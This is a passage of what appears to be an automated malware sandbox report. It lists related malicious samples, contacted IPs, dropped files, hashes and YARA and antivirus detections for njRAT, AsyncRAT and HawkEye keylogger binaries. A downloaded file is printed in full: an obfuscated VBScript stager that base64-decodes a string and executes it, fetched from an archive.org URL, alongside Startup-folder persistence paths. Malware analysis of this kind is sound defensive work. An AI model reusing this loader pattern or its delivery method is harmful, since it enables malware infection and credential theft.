                                                                                        TRANSACTION_INTTRANSFER_1617266945242_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        TRANSACTION_INTTRANSFER_1617266945242_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        RQF 100021790.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        IK8QsX6z2B1lPY0.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        efaxHanglung_302.htmGet hashmaliciousBrowse
                                                                                        • 103.6.198.35
                                                                                        RFQ - HASTALLOY MATERIAL.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        #1002021.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        PO AA21C04U3101-MTXGA6_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        #100028153.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        #ENQ67548820.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        CLOUDFLARENETUSMga2NdfMyb.exeGet hashmaliciousBrowse
                                                                                        • 104.17.63.50
                                                                                        EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                                                        • 104.17.63.50
                                                                                        T4QllcPRsl.exeGet hashmaliciousBrowse
                                                                                        • 104.21.6.252
                                                                                        Telex_Copy.htmlGet hashmaliciousBrowse
                                                                                        • 104.16.18.94
                                                                                        b304a312_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                        • 104.26.12.31
                                                                                        Ha11NppGrb.exeGet hashmaliciousBrowse
                                                                                        • 104.21.85.176
                                                                                        Wh00Ny9HXk.exeGet hashmaliciousBrowse
                                                                                        • 172.67.188.154
                                                                                        ZRpmP5qEC1.exeGet hashmaliciousBrowse
                                                                                        • 172.67.188.154
                                                                                        NIxm9vbD6u.exeGet hashmaliciousBrowse
                                                                                        • 104.17.62.50
                                                                                        Setup.exeGet hashmaliciousBrowse
                                                                                        • 104.23.98.190
                                                                                        4G842SDA.exeGet hashmaliciousBrowse
                                                                                        • 172.67.188.154
                                                                                        Bestellen.exeGet hashmaliciousBrowse
                                                                                        • 172.67.208.174
                                                                                        PR#270473.exeGet hashmaliciousBrowse
                                                                                        • 104.16.13.194
                                                                                        VM_04_28_22.HTMGet hashmaliciousBrowse
                                                                                        • 104.18.11.207
                                                                                        SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        Halkbank_Ekstre_20210426_080203_744632.pdf.exeGet hashmaliciousBrowse
                                                                                        • 172.67.188.154
                                                                                        Aeon Viet Nam Co.,Ltd.docGet hashmaliciousBrowse
                                                                                        • 172.67.188.154
                                                                                        shipment # 46-2021.jpg.exeGet hashmaliciousBrowse
                                                                                        • 172.67.200.16
                                                                                        Bank Remittance Copy0572001. PDF.exeGet hashmaliciousBrowse
                                                                                        • 172.67.188.154
                                                                                        RFQ for MR 29483 for Affordable Villa.docGet hashmaliciousBrowse
                                                                                        • 104.21.19.200

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        37f463bf4616ecd445d4a1937da06e19diagram-1145261761.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        Mga2NdfMyb.exeGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        diagram-397813623.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        Telex_Copy.htmlGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        diagram-1304161436.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        diagram-427473723.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        wendy.klawon@coldwellbanker.com.htmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        NIxm9vbD6u.exeGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        diagram-975956356.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        statistic-2115301159.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        statistic-2009856670.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        payload.exeGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        statistic-1693833818.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        .htmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        #Ud83d#Udcde Maerskdrilling.com AudioMessage_10-86588.htmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        P20200107.DOCGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        sean.adair@redwirespace.com1__redwirespace.com.htmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114
                                                                                        statistic-1014587430.xlsmGet hashmaliciousBrowse
                                                                                        • 207.241.227.114

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe12_pgr.exeGet hashmaliciousBrowse
                                                                                          C:\Users\user\AppData\Local\Temp\pgr.exe12_pgr.exeGet hashmaliciousBrowse
                                                                                            C:\Users\user\AppData\Local\Temp\Tmp.exe11_tmp.exeGet hashmaliciousBrowse

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
                                                                                              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                              Category:dropped
                                                                                              Size (bytes):58596
                                                                                              Entropy (8bit):7.995478615012125
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                              MD5:61A03D15CF62612F50B74867090DBE79
                                                                                              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                              Malicious:false
                                                                                              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):326
                                                                                              Entropy (8bit):3.1146655678160102
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKJkElMwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:BkElMwTJrkPlE99SNxAhUe0ht
                                                                                              MD5:2385F10651B284807BD523A237CC041B
                                                                                              SHA1:3713F39B2654862821D05824635F768679E55A1E
                                                                                              SHA-256:17AAB987AABBEE866449DB169387D68BEF9976D9EC34A9F0300832A3FA71DFA5
                                                                                              SHA-512:F4991D8A9DE584EE4B1E7461499306524DDD814737D728E5C04A86C21A0867490C4E8B312D072BD35928138055380D4FFDDD9428B5C8CDEBB8C357F83EE5EEEC
                                                                                              Malicious:false
                                                                                              Preview: p...... ........ .I.<..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\Tmp.exe.log
                                                                                              Process:C:\Users\user\AppData\Local\Temp\Tmp.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):525
                                                                                              Entropy (8bit):5.278948378331044
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:Q3LaJcP0kaHYGLi1B0/9UkB9t01kKVdisk7v:MLfaYgi6pB4QF
                                                                                              MD5:D9626CB08EED6533EC63687FCD734977
                                                                                              SHA1:E5FEB91EF568D36AD382D9566E2491DB1C90752E
                                                                                              SHA-256:C86F4B0BA418353A162E3EA9872BB66F0CF453710CBA93D8E3F27234E8B284F3
                                                                                              SHA-512:AAA37940B006C31398F5526957C3CFF9AAA3E72ED6B8326CA20AC2F523954CD8DCB03F5125A3B7DA1C060DE77D79CBEADD86A5483ED027508C4B177A0BB5D8AB
                                                                                              Malicious:false
                                                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..
                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\d4c6a6df7bab3dad31763de990c4ed82.exe.log
                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):641
                                                                                              Entropy (8bit):5.279076743766229
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:Q3LaJcP0kaHYGLi1B0/9UkB9t01kKVdisk70z6+xaiv:MLfaYgi6pB4Q+r
                                                                                              MD5:16AC5AEE0452F1A942D29BEDB3E8DE11
                                                                                              SHA1:3D92E71A2595E14ED8899335B2DE9323BAA85A67
                                                                                              SHA-256:76F1FC9BA058F4F094A01D5F345B434070B7E35C9CFD4C20617FD9E6EC230CCE
                                                                                              SHA-512:B1BBBFD16407DC63721EA2F763F4143DF3D0C11698AC0A1BC787502B38AF5A026575D913990CA50B67340F6CB4322E22AC907632457AC43A3C1C42CF2E1DDAA2
                                                                                              Malicious:false
                                                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txt
                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):730
                                                                                              Entropy (8bit):5.326599429048621
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:qzgg3Zl1jnjXuxdDLBtO23FbvsHbtQn2cGbl9ZDu9eFYCvgUnt9YE:qzgg35jnjMe21rwO2zFu9bClwE
                                                                                              MD5:7D6452CD01754786FF61188733C7E4D4
                                                                                              SHA1:893DDBA0E2B3E478750E349DB75BFCAB10D71361
                                                                                              SHA-256:C79CA848CAAFD9525FA6505C1EC7C6AE2AAF3ABAD4DCF73FC988DD769511B58A
                                                                                              SHA-512:E446959A9A4C66F7F4182ADEBBAAA79D2EA5D57D36608142404632C8B123715DD263820A6D749020DADE425C600608336BA92CC7D5C8C012542E645C0325E046
                                                                                              Malicious:false
                                                                                              IE Cache URL:https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
                                                                                              Preview: dim ARrN ..ARrN= (" *+*+*+*+*+* ")....dim WOUP ..WOUP= (" /456/").... UnSN = replace(UnSN, (ARrN), "A" ).. UnSN = replace(UnSN, (WOUP), "m" )....UnSN = StrReverse(UnSN) ..UnSN = OyDP(UnSN) ....Function OyDP(WJOv)....dim GUHT,UKsz..Set GUHT = CreateObject("Msxml2.DOMDocument.3.0")..Set UKsz = GUHT.CreateElement("base64")..UKsz.dataType = ("bin.base64") ..UKsz.text = WJOv ..OyDP = HLWn(UKsz.nodeTypedValue)..Set UKsz = Nothing ..Set GUHT = Nothing ..End Function....Function HLWn(PNYC)....dim JuBs ..Set JuBs = CreateObject("ADODB.Stream") ..JuBs.Type = 1 ..JuBs.Open ..JuBs.Write (PNYC) ..JuBs.Position = 0 ..JuBs.Type = 2 ..JuBs.CharSet = ("UTF-8") ..HLWn = JuBs.ReadText ..Set JuBs = Nothing ..End Function....execute UnSN
                                                                                              C:\Users\user\AppData\Local\Temp\Tmp.exe
                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):69632
                                                                                              Entropy (8bit):5.550691485739008
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Xq47KHbq7NIowMZVHC8kUYUsFWn4UVm7JsWYKcOvt9t9cFKpBBDZ0DauldK:Ubq7JrDCR3UP4UVkRYw/tekpBBWdK
                                                                                              MD5:9B30598F8F05C46F8ABB22A4C2ABCC9E
                                                                                              SHA1:73665A73C48C889AF51EC9C99D8432218676B0CD
                                                                                              SHA-256:2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
                                                                                              SHA-512:35B2D08550387CAFED531B6EE3BA81CF1567E0E6934263044896060E39C6A865A8176A9817E259DD0527FC021E2DC9C9845649125EDF5CBFF1FB198AF3175360
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Brian Wallace @botnet_hunter
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Metadefender, Detection: 78%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: 11_tmp.exe, Detection: malicious, Browse
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(......*..*..(......*..s.........s.........s.........s.........s..........*....0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....
                                                                                              C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):2
                                                                                              Entropy (8bit):1.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Qn:Qn
                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                              Malicious:false
                                                                                              Preview: ..
                                                                                              C:\Users\user\AppData\Local\Temp\pgr.exe
                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):24064
                                                                                              Entropy (8bit):5.525319833157279
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:o8aZYC9twBNdcvFaly2H0dbJo6HghcASEJqc/ZmRvR6JZlbw8hqIusZzZU4:uY+sNKqNHnSdRpcnuq
                                                                                              MD5:A08F2FAC257ABBBDDDBBD4439F32CFD0
                                                                                              SHA1:26D3ED4771B701A82F6AA32B747E27BB26E9864C
                                                                                              SHA-256:BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
                                                                                              SHA-512:3BEAD648A1AD82BD4E5599A55AE573B4CE6DC24EBDC3F0DAEC2C0A327CA1BF5E45A254E4F2480CEE0FEC0A4F83B15863679A63F7DCC0CE37D8F50E644BEFEF40
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Metadefender, Detection: 91%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 91%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: 12_pgr.exe, Detection: malicious, Browse
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..`.................V...........t... ........@.. ....................................@.................................4t..W.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................pt......H.......,K...)....../....................................................0..........r...p.....r...p...........r%..p.....r;..p.....rE..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r+..p...........*...0..;.......~....o....o....r-..p~....(.....o.....o......%(.....(......*.........,,.......0..D.......~....o....o....r-..p~....(....o......(....o.....
                                                                                              C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\pgr.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):48640
                                                                                              Entropy (8bit):5.556493970256603
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:yuwCfTg46YbWUn8jjmo2qr/Is2z9lvPIHxFxpBpRNr0bHwYcrhgaxRA79sPsXbrn:yuwCfTgp/2xKHb/gbHwYcFgt799XbrLL
                                                                                              MD5:6107D33B54A998C142311E55B3EC53D2
                                                                                              SHA1:1C0B31C186FD413DC74E736A8BDEFBF4D0725EEC
                                                                                              SHA-256:01A31C21F7C70363B4A5CA56BECD789D96646A1F0FD5F755E77EB8E26AE95D6A
                                                                                              SHA-512:2487F434B5100541081D6B9259E617B646FE67220215D983A469E029AC87630A5492C003A642767F340C6E4580CDC203A91F153CA688BD6EAC1514EEBE0FEE75
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................N.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...u.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr^%.p~....(o....#...*.s...
                                                                                              C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\pgr.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):532992
                                                                                              Entropy (8bit):6.506949900240727
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:juJEqxmd0bS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnxp:Td0QtqB5urTIoYWBQk1E+VF9mOx9si
                                                                                              MD5:5C0E9E0C72288F8B70BB68C0036ECB52
                                                                                              SHA1:920C9ECF8EBD35A8D0FF53A67A9C5DB2F1C35F59
                                                                                              SHA-256:249026BE43AFFBDC61BE8DD1AAE8602668BA6BEE72E43D4760B2ACC7AB1526D4
                                                                                              SHA-512:F7A508AA110DB5BF1BD0E6B867D777525B0C17719A54B3E881CE7E8BD544152BF1E0BEC12509028A302559CF987A3956D2409364F601F015559D67437CF8FB0D
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.....................4........... ........@.. ....................................@.................................d...W.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`....... ..............@..B........................H.......0}..4..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\pgr.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):24064
                                                                                              Entropy (8bit):5.525319833157279
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:o8aZYC9twBNdcvFaly2H0dbJo6HghcASEJqc/ZmRvR6JZlbw8hqIusZzZU4:uY+sNKqNHnSdRpcnuq
                                                                                              MD5:A08F2FAC257ABBBDDDBBD4439F32CFD0
                                                                                              SHA1:26D3ED4771B701A82F6AA32B747E27BB26E9864C
                                                                                              SHA-256:BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
                                                                                              SHA-512:3BEAD648A1AD82BD4E5599A55AE573B4CE6DC24EBDC3F0DAEC2C0A327CA1BF5E45A254E4F2480CEE0FEC0A4F83B15863679A63F7DCC0CE37D8F50E644BEFEF40
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Metadefender, Detection: 91%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 91%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: 12_pgr.exe, Detection: malicious, Browse
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..`.................V...........t... ........@.. ....................................@.................................4t..W.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................pt......H.......,K...)....../....................................................0..........r...p.....r...p...........r%..p.....r;..p.....rE..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r+..p...........*...0..;.......~....o....o....r-..p~....(.....o.....o......%(.....(......*.........,,.......0..D.......~....o....o....r-..p~....(....o......(....o.....
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\servieda.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):6963200
                                                                                              Entropy (8bit):5.550691485739008
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:nLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL7:
                                                                                              MD5:08C62FEA3D61370C3CA97568656D8304
